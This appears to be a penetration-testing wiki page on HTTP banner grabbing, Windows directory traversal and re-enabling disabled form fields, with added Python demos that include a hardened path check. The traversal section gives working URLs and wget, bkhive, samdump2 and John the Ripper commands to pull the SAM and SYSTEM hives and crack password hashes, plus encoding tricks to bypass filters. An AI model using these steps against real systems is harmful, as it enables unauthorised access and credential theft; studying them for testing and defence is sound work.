Web

Command Line Stuff

A simple way to pull the headers from a web server, using netcat or telnet. Type the request line and then press Enter twice: the blank line is what ends the request, and the server will sit there waiting until it sees it. HTTP/1.0 does not require a Host: header, but if the server hosts several name-based sites you will get the default one unless you add it.

$ nc 192.168.120.103 80
HEAD / HTTP/1.0

The server's response should be something like:

HTTP/1.1 200 OK
Date: Wed, 13 May 2009 14:14:53 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
Last-Modified: Tue, 12 May 2009 10:13:12 GMT
ETag: "76032-2d-469b457a05e00"
Accept-Ranges: bytes
Content-Length: 45
Connection: close
Content-Type: text/html
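The same exchange done from Python, as an added example that is not part of the original page: build_head_request() shows the exact bytes the netcat session sends (including the blank line and an optional Host: header), parse_response() turns a raw response into a status code and a header dictionary, and grab_banner() wires the two to a socket. The sample response below is constructed from the one shown above so the parser can be exercised offline; grab_banner() is the only part that needs a network.

```python
import socket

# Constructed sample: the response shown on this page, as the raw bytes a
# server would send (CRLF line endings, blank line terminating the headers).
SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Date: Wed, 13 May 2009 14:14:53 GMT\r\n"
    b"Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch\r\n"
    b"Last-Modified: Tue, 12 May 2009 10:13:12 GMT\r\n"
    b'ETag: "76032-2d-469b457a05e00"\r\n'
    b"Accept-Ranges: bytes\r\n"
    b"Content-Length: 45\r\n"
    b"Connection: close\r\n"
    b"Content-Type: text/html\r\n"
    b"\r\n"
)


def build_head_request(host, path="/"):
    """Exact bytes behind 'HEAD / HTTP/1.0' + Enter twice.

    Host: is optional in HTTP/1.0 but picks the right site when the server
    serves several name-based virtual hosts.
    """
    return f"HEAD {path} HTTP/1.0\r\nHost: {host}\r\n\r\n".encode("ascii")


def parse_response(raw):
    """Split a raw HTTP response into (status_code, headers).

    Header names are lower-cased; repeated headers are joined with ', '.
    Accepts LF-only line endings as well, since some servers send those.
    """
    sep = b"\r\n\r\n" if b"\r\n\r\n" in raw else b"\n\n"
    head, _, _body = raw.partition(sep)
    lines = head.decode("iso-8859-1").splitlines()
    _version, status, *_reason = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        name, value = name.strip().lower(), value.strip()
        headers[name] = f"{headers[name]}, {value}" if name in headers else value
    return int(status), headers


def grab_banner(host, port=80, timeout=5.0):
    """Send the HEAD request over a plain socket and parse what comes back."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_head_request(host))
        raw = b""
        while b"\r\n\r\n" not in raw and b"\n\n" not in raw:
            chunk = sock.recv(4096)
            if not chunk:          # server closed before finishing the headers
                break
            raw += chunk
    return parse_response(raw)


if __name__ == "__main__":
    # Offline demonstration on the constructed sample; for a live host use
    # grab_banner("192.168.120.103", 80) instead.
    code, hdrs = parse_response(SAMPLE_RESPONSE)
    print(code, hdrs["server"])
```

The parser lower-cases header names because servers vary the case freely, and it joins repeated headers rather than silently keeping the last one, which matters when fingerprinting a server that sends several Via or Set-Cookie lines.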

Directory Traversal

Pulling Hashes via Web Server

This example will retrieve the C:\boot.ini file from a server that appends the request path to its document root without checking where the result lands. The surplus ../ segments do no harm: anything that climbs above the drive root is simply discarded, so it is easier to use more than you need than to count the directory depth.

http://XX.XX.XX.XX:<port>/../../../../../../boot.ini

This example will retrieve a copy of the target system's SAM registry hive from the Windows repair folder:

http://XX.XX.XX.XX:<port>/../../../../../../windows/repair/sam
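Why those URLs land on C:\boot.ini and C:\windows\repair\sam, shown as an added example that is not part of the original page: resolve_naive() models what a vulnerable server does (decode the path, glue it onto the document root, let the filesystem normalise it), and check_request() is the fixed version, which resolves the path exactly the same way and then refuses anything that ends up outside the document root. The document root C:\Inetpub\wwwroot and the request paths are assumptions constructed for the demonstration; the last one is the same traversal with the dots URL-encoded, which is the variant to try when the plain form is filtered or normalised on the way.

```python
import ntpath
from urllib.parse import unquote

# Assumed document root; the real one depends on the target's configuration.
WEBROOT = r"C:\Inetpub\wwwroot"

# Constructed request paths: the two from this page plus a few variants.
REQUESTS = [
    "/index.html",
    "/images/../index.html",                      # '..' that stays inside the root
    "/../../../../../../boot.ini",
    "/../../../../../../windows/repair/sam",
    "/%2e%2e/%2e%2e/%2e%2e/windows/repair/sam",   # same traversal, dots URL-encoded
]


def resolve_naive(webroot, url_path):
    """What a vulnerable server does: decode the path, append it to the
    document root and let the filesystem normalise the result.

    ntpath.normpath drops '..' segments that climb above the drive root, which
    is why the surplus ../ in the URLs above are harmless to the attacker.
    """
    return ntpath.normpath(ntpath.join(webroot, unquote(url_path).lstrip("/")))


def check_request(webroot, url_path):
    """Hardened version: resolve the path the same way, then require the result
    to lie under the document root. Returns (allowed, resolved_path).

    commonpath compares whole path components, so C:\\Inetpub\\wwwroot2\\x is
    rejected where a naive startswith() check would let it through.
    """
    root = ntpath.normpath(webroot)
    target = resolve_naive(root, url_path)
    try:
        allowed = ntpath.commonpath([root, target]) == root
    except ValueError:   # different drive letters: certainly outside the root
        allowed = False
    return allowed, target


if __name__ == "__main__":
    for req in REQUESTS:
        allowed, target = check_request(WEBROOT, req)
        print(f"{req:44} -> {target:36} {'served' if allowed else 'BLOCKED'}")
```

The order matters: canonicalise first, then check containment. A server that instead rejects the literal string "../" is still open to the encoded form, to overlong UTF-8 encodings of the dots and slashes, and to whatever the filesystem layer accepts that the filter did not think of.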

With the SAM and SYSTEM registry hives, it is possible to extract the system's local password hashes for offline cracking; the SYSTEM hive holds the boot key that encrypts the SAM, so you need both. The copies in the repair folder are backups written at install time or by a later repair-disk run, so the hashes may be out of date, but unlike the live hives under system32\config they are not locked by the running system. The tools needed to extract the hashes from these files are bkhive, samdump2, and John the Ripper (all is the name of the wordlist file in the last command). These tools can be found on our BackTrack testing image. Note that wget, like most HTTP clients, collapses the ../ segments before sending the request; if a path that works over netcat comes back as 404 from wget, send the request by hand, use curl --path-as-is, or encode the dots as %2e%2e.

$ wget -q http://XX.XX.XX.XX:<port>/../../../../../../windows/repair/sam
$ wget -q http://XX.XX.XX.XX:<port>/../../../../../../windows/repair/system.bak
$ bkhive system.bak keyfile
$ samdump2 sam keyfile > hashes
$ john --wordlist=all hashes

Javascript Void(0)

You can use the following javascript: URLs to re-enable form controls that the HTML marks as disabled (the same trick works for readonly fields). Obviously, you have to adjust the form and element names to fit your specific case. Disabling a control is a client-side convenience only: the browser owns the DOM, so the server must never assume that a disabled button cannot be clicked.

javascript:document.accrual.elements['Add'].disabled=false;void(0);
javascript:document.chartField.elements['Update'].disabled=false;void(0);

Here's how it should break down:

javascript:document.FormName.elements['Name of Form Element'].disabled=true/false;void(0);

The void(0) makes the whole expression evaluate to undefined. A javascript: URL whose result is anything else is treated as a new document and replaces the page, so without it the browser would navigate away instead of just running the code in place. Current browsers strip the javascript: prefix from text pasted into the address bar; type it in, or run the same statement from the developer console.

Unless otherwise stated, the content of this page is licensed under Creative Commons Attribution-Share Alike 2.5 License.